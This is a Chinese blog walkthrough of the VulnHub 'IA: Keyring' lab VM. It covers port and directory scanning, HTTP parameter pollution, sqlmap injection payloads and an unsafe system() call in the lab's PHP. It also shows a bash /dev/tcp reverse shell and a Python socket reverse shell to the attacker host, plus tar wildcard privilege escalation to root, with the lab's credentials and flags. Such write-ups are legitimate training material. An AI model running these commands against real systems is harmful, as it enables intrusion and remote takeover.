【Vulnhub 靶场】【IA: Keyring (1.0.1)】【中等】【20210730】

于 2023-12-17 16:28:08 发布
阅读量941 收藏 21
点赞数 18
文章标签: VulnHub 渗透靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43094965/article/details/135046210
版权

1、环境介绍

靶场介绍https://www.vulnhub.com/entry/ia-keyring-101,718/
靶场下载https://download.vulnhub.com/ia/keyring-v1.01.ova
靶场难度:中等
发布日期:2021年07月30日
文件大小:1.1 GB
靶场作者:InfoSec Articles
靶场系列:IA
靶场描述

  • 与VMware相比,这在VirtualBox中效果更好。
  • 变更日志-2021-06-30-v1.0.1(隐私问题)-2021-06-29-v1.0.0

打靶耗时:4+小时,HPP 漏洞第一次遇到,RCE 执行权限上绕个弯耽误了些时间,SSH 用户也有弯。总结就是到处都是弯弯绕,的确好评。
打靶关键

  1. Web 目录扫描
  2. HPP 漏洞利用、SQL 注入漏洞利用
  3. Linux 信息收集、SUID 提权
  4. 可执行文件解析、tar 通配符提权

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.37   08:00:27:1a:b1:2a       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.267 seconds (112.92 hosts/sec). 2 responded

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 00:08 EST
Nmap scan report for 192.168.56.37
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:eb:fd:0a:76:8a:2a:75:6e:9b:6e:7b:51:c4:28:db (RSA)
|   256 53:31:35:c0:3a:a0:48:2f:3a:79:f5:56:cd:3c:63:ee (ECDSA)
|_  256 8d:7b:d3:c9:15:61:03:b1:b5:f1:d2:ed:2c:01:55:65 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:1A:B1:2A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.54 ms 192.168.56.37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.29 seconds

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 22,80 192.168.56.37           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 00:10 EST
Nmap scan report for 192.168.56.37
Host is up (0.0012s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn·t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn·t find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn·t find a file-type field.
|   
|_    Couldn·t find a file-type field.
|_http-stored-xss: Couldn·t find any stored XSS vulnerabilities.
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-enum: 
|_  /login.php: Possible admin folder
MAC Address: 08:00:27:1A:B1:2A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds

3、目录扫描

# 基础小字典,初扫摸底
dirb http://192.168.56.37
# 较全面 conda activate py37
dirsearch -u http://192.168.56.37 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.37" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.37 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://192.168.56.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
  • http://192.168.56.37/index.php
  • http://192.168.56.37/control.php
  • http://192.168.56.37/home.php
  • http://192.168.56.37/login.php
  • http://192.168.56.37/history.php
  • http://192.168.56.37/about.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、SqlMap 登录页面「login.php」(失败)

POST /login.php HTTP/1.1
Host: 192.168.56.37
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.37
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.37/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5
Connection: close

uname=123&upass=asd&btn=

sqlmap -r "login.txt" --level=3 --risk=3
sqlmap -o -u "http://192.168.56.37/login.php" --batch -forms --level=3 --risk=3

5、创建用户

POST /index.php HTTP/1.1
Host: 192.168.56.37
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.37
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.37/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5
Connection: close

uname=123&upass=123&btn=

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6、根据提示「HPP」漏洞

  • 根据「history.php」登录前后不同提示,进行 FUZZ
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ffuf -u "http://192.168.56.37/history.php?FUZZ=123" -b "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 1

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.37/history.php?FUZZ=123
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Header           : Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

user                    [Status: 200, Size: 95, Words: 5, Lines: 1, Duration: 26ms]
:: Progress: [6453/6453] :: Job [1/1] :: 904 req/sec :: Duration: [0:00:07] :: Errors: 0 ::

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# curl http://192.168.56.37/history.php?user=123  
can·t find this user·s activity                                                                                                                      
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# curl http://192.168.56.37/history.php?user=123 --cookie "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5"
Pages visited by user 123<br><br>
home<br><br>
home<br><br>
about<br><br>
home<br><br>
about<br><br>

6.1、同参数污染

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ffuf -u "http://192.168.56.37/history.php?user=123&user=FUZZ" -b "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 1

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.37/history.php?user=123&user=FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Header           : Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________

admin                   [Status: 200, Size: 80, Words: 5, Lines: 1, Duration: 32ms]
Admin                   [Status: 200, Size: 80, Words: 5, Lines: 1, Duration: 2758ms]
:: Progress: [6453/6453] :: Job [1/1] :: 470 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# curl "http://192.168.56.37/history.php?user=123&user=admin" --cookie "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5"
Pages visited by user admin<br><br>
https://github.com/cyberbot75/keyring<br><br>

6.2、获取 Git 地址

  • 获取了MySQL 登录信息
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# git clone https://github.com/cyberbot75/keyring                                                            
正克隆到 'keyring'...
remote: Enumerating objects: 21, done.
remote: Counting objects: 100% (21/21), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 21 (delta 9), reused 0 (delta 0), pack-reused 0
接收对象中: 100% (21/21), 6.26 KiB | 6.26 MiB/s, 完成.
处理 delta 中: 100% (9/9), 完成.

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cd keyring/html

(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# ls
about.php  control.php  home.php  index.php  login.php  logout.php

(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# cat login.php
......
$servername = "localhost";
$username = "root";
$password = "sqluserrootpassw0r4";
$database = "users";

$conn = mysqli_connect($servername, $username, $password, $database);
......

(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# cat control.php
Code for staging server

<!DOCTYPE html>
<html>
<head>
    <style>
        ul {
            list-style-type: none;
            margin: 0;
            padding: 0;
            overflow: hidden;
            background-color: #333;
        }

        li {
            float: left;
        }

        li a {
            display: block;
            color: white;
            text-align: center;
            padding: 14px 16px;
            text-decoration: none;
        }

        li a:hover {
            background-color: skyblue;
        }
    </style>
</head>
<body>

<ul>
    <li><a class="active" href="home.php">Home</a></li>
    <li><a href="control.php">Control</a></li>
    <li><a href="about.php">About</a></li>
    <li><a href="logout.php">Logout</a></li>
</ul>

</body>
</html>

<?php
session_start();
if (isset($_SESSION['name'])) {
    $servername = "localhost";
    $username = "root";
    $password = "sqluserrootpassw0r4";
    $database = "users";

    $conn = mysqli_connect($servername, $username, $password, $database);
    $name = $_SESSION['name'];
    $date = date('Y-m-d H:i:s');
    echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
    $sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";

    if (mysqli_query($conn, $sql)) {
        echo "<br><br>";
        echo "Date & Time : " . $date;
    }
    system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
} else {
    header('Location: index.php');
}
?>

6.3、尝试 RCE 漏洞(失败)

  • 没有打印「Date & Time :」,实际代码与获取代码有一定偏差
  • 猜测应该都是缺少权限,或者 Cookie 一类的东西

在这里插入图片描述

7、MySQL 数据库信息收集

7.1、MySQL 登录

  • 获取了三个用户密码
www-data@keyring:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: sqluserrootpassw0r4

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| users              |
+--------------------+
5 rows in set (0.05 sec)

mysql> use users;
use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| details         |
| log             |
+-----------------+
2 rows in set (0.00 sec)

mysql> select * from details;
select * from details;
+-------+-----------------------+
| name  | password              |
+-------+-----------------------+
| 123   | 123                   |
| admin | myadmin#p4szw0r4d     |
| john  | Sup3r$S3cr3t$PasSW0RD |
+-------+-----------------------+
3 rows in set (0.00 sec)

7.2、SqlMap 带 Cookie(这是一个备用方案,结果和上面一样的)

  • 获取了三个用户密码
(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.37/history.php?user=123" --cookie="PHPSESSID=2hhk74mca910mj6gfgbhl5lum5"
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.10#stable}
|_ -| . [(]     || . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user·s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:20:15 /2023-11-20/
......
---
Parameter: user (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=123' AND (SELECT 9321 FROM (SELECT(SLEEP(5)))gtDn) AND 'BtUg'='BtUg

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: user=123' UNION ALL SELECT CONCAT(0x71716b7671,0x74626a566d4d52464f444557767149476b45496d524d784b58414c51657a614e774b41524c634d61,0x71627a6271)-- -
---
......

(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.37/history.php?user=123" --cookie="PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.10#stable}
|_ -| . [(]     || . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

......
[04:21:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[04:21:11] [INFO] fetching database names
[04:21:11] [WARNING] reflective value(s) found and filtering out
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users

[04:21:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.37'

[*] ending @ 04:21:11 /2023-11-20/

(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.37/history.php?user=123" --cookie="PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" -D users --dump-all
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.7.10#stable}
|_ -| . [(]     || . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

......
[04:21:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[04:21:43] [INFO] fetching tables for database: 'users'
[04:21:43] [INFO] fetching columns for table 'details' in database 'users'
[04:21:43] [WARNING] reflective value(s) found and filtering out
[04:21:43] [INFO] fetching entries for table 'details' in database 'users'
Database: users
Table: details
[3 entries]
+--------+-----------------------+
| name   | password              |
+--------+-----------------------+
| 123    | 123                   |
| admin  | myadmin#p4szw0r4d     |
| john   | Sup3r$S3cr3t$PasSW0RD |
+--------+-----------------------+
......

8、登录 admin 用户

在这里插入图片描述
在这里插入图片描述

8.1、反弹连接

bash -c 'bash -i >& /dev/tcp/192.168.56.3/10086 0>&1'
# URL 编码
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.3%2F10086%200%3E%261%27

在这里插入图片描述

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.37] 57180
bash: cannot set terminal process group (907): Inappropriate ioctl for device
bash: no job control in this shell
www-data@keyring:/var/www/html$

8.2、SSH 用户 john 登录(失败)

  • 密码在「7.1」
  • 无法直接登录,那就后面「su」切换
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh john@192.168.56.37                                                                                                      
The authenticity of host '192.168.56.37 (192.168.56.37)' can·t be established.
ED25519 key fingerprint is SHA256:9F8H2qpKYJim3wdRC0XiJaF8aTlTnjZGFW/KgrBtHjc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.37' (ED25519) to the list of known hosts.
john@192.168.56.37: Permission denied (publickey).

9、Linux 信息收集

9.1、文件信息收集

www-data@keyring:/var/www/html$ cat control.php
......
<?php
session_start();
if (isset($_SESSION['name'])) {
    $servername = "localhost";
    $username = "root";
    $password = "sqluserrootpassw0r4";
    $database = "users";

    $conn = mysqli_connect($servername, $username, $password, $database);
    $name = $_SESSION['name'];
    $date = date('Y-m-d H:i:s');

    if ($name === "admin") {
        echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
        $sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";

        if (mysqli_query($conn, $sql)) {
            echo "<br><br>";
            echo "Date & Time : " . $date;
        }
        system($_GET['cmdcntr']); //system() is not safe to use , dont' forget to remove it  in latest release .
    } else {
        echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";
    }
} else {
    header('Location: index.php');
}
?>

www-data@keyring:/var/www/html$ cat history.php
<?php

session_start();

$servername = "localhost";
$username = "root";
$password = "sqluserrootpassw0r4";
$database = "users";

$conn = mysqli_connect($servername, $username, $password, $database);

$name = $_SESSION['name'];
$users = $_GET['user'];

$sql = "select page_visited from log where name='$users'";
if (isset($name)) {
    $res = mysqli_query($conn, $sql);

    if (mysqli_num_rows($res) > 0) {

        echo "Pages visited by user " . $users;
        echo "<br><br>";
        while ($row = mysqli_fetch_assoc($res)) {

            echo $row['page_visited'];
            echo "<br><br>";
        }
    }
} else {
    echo "can't find this user's activity";
}

?>

9.2、用户信息收集

在这里插入图片描述

10、SU 切换用户

  • 这里第一次「su」切换用户报错,是因为当前「shell」的问题,重新启用一个就好了,这里使用Python重新启用一个「shell」。
www-data@keyring:/var/www/html$ su john
su john
su: must be run from a terminal
www-data@keyring:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@keyring:/var/www/html$ su john
su john
Password: Sup3r$S3cr3t$PasSW0RD

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

john@keyring:/var/www/html$

11、SUID 提权

john@keyring:~$ ls -al
ls -al
total 48
drwxr-x--- 3 john john  4096 Nov 20 20:24 .
drwxr-xr-x 3 root root  4096 Jun  7  2021 ..
lrwxrwxrwx 1 john john     9 Jun 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 john john   220 Jun  7  2021 .bash_logout
-rw-r--r-- 1 john john  3771 Jun  7  2021 .bashrc
-rwsr-xr-x 1 root root 16784 Jun 20  2021 compress
drwx------ 3 john john  4096 Nov 20 20:24 .gnupg
-rw-r--r-- 1 john john   807 Jun  7  2021 .profile
-rw-rw-r-- 1 john john   192 Jun 20  2021 user.txt
john@keyring:~$ cat user.txt
cat user.txt

[ Keyring - User Owned ]
----------------------------------------------
Flag : VEhNe0Jhc2hfMXNfRnVuXzM4MzEzNDJ9Cg==
----------------------------------------------
by infosecarticles with <3

john@keyring:~$ ./compress
./compress
/bin/tar: archive.tar: file is the archive; not dumped

11.1、文件传出

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -nlvp 1234 > compress  
listening on [any] 1234 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.37] 39236

john@keyring:~$ nc 192.168.56.3 1234 < /home/john/compress
nc 192.168.56.3 1234 < /home/john/compress
john@keyring:~$

11.2、文件解析

  • 关键信息:/bin/tar cf archive.tar *
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# chmod +x compress  
                                                                                                                                  
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# strings ./compress    
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/tar cf archive.tar *
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0

11.3、tar 通配符提权

john@keyring:~$ echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.3\",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > shell.sh
john@keyring:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"
john@keyring:~$ echo "" > --checkpoint=1
john@keyring:~$ ./compress
./compress
/bin/tar: archive.tar: file is the archive; not dumped

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 9002              
listening on [any] 9002 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.37] 48226
# python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@keyring:~# cd /root
cd /root
root@keyring:/root# ls
ls
root.txt
root@keyring:/root# cat root.txt
cat root.txt

[ Keyring - Rooted ]
---------------------------------------------------
Flag : VEhNe0tleXIxbmdfUjAwdDNEXzE4MzEwNTY3fQo=
---------------------------------------------------
by infosecarticles with <3

root@keyring:/root#
关注
  • 18
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
krcli:Keyring命令行界面
04-04
**krcli:Keyring命令行界面** krcli是一款专为管理密钥环而设计的命令行工具,它允许用户在Linux、Unix等操作系统环境下方便地操作密钥存储。密钥环是用于安全存储密码、API密钥和其他敏感信息的工具,通常与系统...
go-keyring:Go的跨平台密钥环界面
05-28
进入钥匙圈库 go-keyring是一个与操作系统无关的库,用于设置,获取和删除系统密钥环中的机密。 它支持OS X , Linux(dbus)和Windows 。 go-keyring是在其作者搜索但找不到更好的替代方法之后创建的。 它旨在简化...
Vulnhub-IA: KEYRING (1.0.1)渗透
laoyanCZ的博客
12-16 941
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
靶机渗透练习87-IAKeyring (1.0.1)
hirak0的博客
04-30 1348
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ Description Difficulty: Intermediate Goal: Get the root shell and read all the 2 flags. Information: No hints will be provided before 24 hours of the release. Try Harder! If you need any hints,
渗透练习 Vulnhub靶场 Keyring
hljzzj的博客
02-15 1863
No.26 Keyring 靶机信息 下载地址: https://www.vulnhub.com/entry/ia-keyring-101,718/ 靶场: VulnHub.com 靶机名称: IA: Keyring (1.0.1) 难度: 简单-中等 发布时间: 2021年7月30日 目标: 2个flag 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -sP 19
靶机渗透练习10-Keyring (HPP漏洞)
Force~
04-02 4835
靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn .
Vulnhub-keyring靶机
lionwerson的博客
12-06 3019
keyring下载地址https://download.vulnhub.com/ia/keyring-v1.01.ova1.下载靶机,网络改为桥接模式然后打开靶机,nmap扫描一下: nmap.exe -p- 192.168.0.15 开放ssh的22端口和http的80端口,ssh端口无法登录,设置了只能用密钥登录。 先注册一个用户,admin用户显示已经被注册了,只能换一个注册: 后台非常简陋,看来不是cms,路径扫描找到一个history.php的文件。 histor.
ERROR: missing keyring, cannot use cephx for authentication
weixin_34349320的博客
09-14 991
[talen@ceph_admin ~]$ ceph health 2015-09-14 15:11:55.503854 7fdc2297f700 -1 monclient(hunting): ERROR: missing keyring, cannot use cephx for authentication 2015-09-14 15:1...
VulnHub】billu_b0x靶场复盘
redwand的博客
01-21 4572
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
连接mysql报错:Can not perform keyring migration : Invalid --keyring-migration-source option.
热门推荐
Dream_xun的专栏
08-13 2万+
报错代码: mysqld: Can not perform keyring migration : Invalid --keyring-migration-source option. 解决方案: mysqld命令是MySQL的主程序,用来安装初始化;mysql是MySQL的命令行工具;这里因为命令敲成了mysqld -u root -p导致的,正确的命令应该是mysql -uroot -p...
keyring-node:简单静态加密,支持Node.js的密钥轮换
05-22
yarn add -E @fnando/keyring 用法 加密 默认情况下,AES-128-CBC是用于加密的算法。 该算法使用16个字节的密钥,但是您需要使用两倍大小的密钥,因为该密钥的一半将用于生成HMAC。 前16个字节将用作加密密钥,后16...
devuan-keyring:为 devuan 包签名公钥环
07-10
在这个场景中,我们关注的是"devuan-keyring",这是一个专门为Devuan项目提供的包签名公钥环。 首先,让我们理解什么是Devuan。Devuan是一个基于Debian的Linux发行版,它最大的特色是不包含Systemd,而是采用传统的...
MySQL 整表加密解决方案 keyring_file详解
09-09
MySQL 整表加密解决方案的关键在于使用了keyring_file插件,该插件自MySQL 5.7.11版本开始引入,旨在为用户提供一种在数据库级别实现数据加密的方法。keyring_file利用本地文件系统存储加密密钥,这些密钥用于加密和...
java毕业作品-JAVA技术在《堡垒》手机游戏开发中的应用与探索(源代码+论文)
最新发布
08-03
java毕业作品_JAVA技术在《堡垒》手机游戏开发中的应用与探索(源代码+论文)
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入 刷之前备份原bios避免翻车
08-03
联想M8500T(Q87主板)BIOS加入NVME协议,用编程器直接刷入 8M+4M一起刷入。刷之前备份原bios避免翻车
第5章 传输层 计算机网络思维导图,结合学习通作业
08-03
计算机网络思维导图,结合学习通作业,方便备考复习。
Navicat 的主要功能、使用方法和常见问题.md
08-03
Navicat 的主要功能、使用方法和常见问题.md
Keyring is skipped due to an exception: 'keyring.backends'
05-25
